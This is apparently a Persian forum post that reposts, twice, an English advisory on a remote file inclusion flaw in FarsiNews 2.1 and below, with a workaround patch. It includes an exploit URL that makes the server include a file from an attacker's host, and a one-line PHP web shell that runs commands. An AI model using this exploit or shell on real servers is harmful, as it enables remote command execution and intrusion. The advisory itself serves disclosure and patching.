من که نتونستم برم سایت فارسی نیوز مثل اینکه خوابیده
مجبور شدم اینجا ÷ست بدم
البته نگران نشید نسخه قدیمی باگ داشته و نسخه 2.5 صحیح و سالمه
سالار جان مامبو هم زیاد بد نیست
مجبور شدم اینجا ÷ست بدم
البته نگران نشید نسخه قدیمی باگ داشته و نسخه 2.5 صحیح و سالمه
سالار جان مامبو هم زیاد بد نیست
Remote File Inclusion in FarsiNews 2.1 and below
FarsiNews is a News Publishing System That uses Flat files to store it`s Datas... Farsinews is a persian and improved translation of CuteNews, AjFork, CuteHack and CuteSQL...
for more information about FarsiNews Publishing System visit http://www.farsinewsteam.com
Credit:
The information has been provided by Hamid Ebadi
(Hamid Network Security Team) :[email protected].
The original article can be found at : http://hamid.ir/security
Vulnerable Systems:
FarsiNews 2.1 Beta 2 and below
Vulnerable Code:
The following lines in loginout.php :
require_once($cutepath."/inc/functions.inc.php");
require_once($cutepath."/data/config.php");
Exploits:
If register_globals=ON has been marked (check PHP.INI) we can exploit below URL to cause it to include external file.
The following URL will cause the server to include external files ( phpshell.txt ):
http://[target]/loginout.php?cmd=dir&cutepath=http://[attacker]/phpshell.txt?
phpshell.txt
-------------------
<?
system ($_GET['cmd']);
die ("<h3>http://Hamid.ir >> Hamid Ebadi << (Hamid Network Security Team)</h3> ");
?>
-----[EOF]--------
Workaround:
use FarsiNews 2.5 or for Unofficial Patch , simply add the following line in the second line of loginout.php:
if (isset($_REQUEST["cutepath"])){ die("Patched by Hamid Ebadi -->http://hamid.ir ( Hamid Network Security Team) "); }
FarsiNews is a News Publishing System That uses Flat files to store it`s Datas... Farsinews is a persian and improved translation of CuteNews, AjFork, CuteHack and CuteSQL...
for more information about FarsiNews Publishing System visit http://www.farsinewsteam.com
Credit:
The information has been provided by Hamid Ebadi
(Hamid Network Security Team) :[email protected].
The original article can be found at : http://hamid.ir/security
Vulnerable Systems:
FarsiNews 2.1 Beta 2 and below
Vulnerable Code:
The following lines in loginout.php :
require_once($cutepath."/inc/functions.inc.php");
require_once($cutepath."/data/config.php");
Exploits:
If register_globals=ON has been marked (check PHP.INI) we can exploit below URL to cause it to include external file.
The following URL will cause the server to include external files ( phpshell.txt ):
http://[target]/loginout.php?cmd=dir&cutepath=http://[attacker]/phpshell.txt?
phpshell.txt
-------------------
<?
system ($_GET['cmd']);
die ("<h3>http://Hamid.ir >> Hamid Ebadi << (Hamid Network Security Team)</h3> ");
?>
-----[EOF]--------
Workaround:
use FarsiNews 2.5 or for Unofficial Patch , simply add the following line in the second line of loginout.php:
if (isset($_REQUEST["cutepath"])){ die("Patched by Hamid Ebadi -->http://hamid.ir ( Hamid Network Security Team) "); }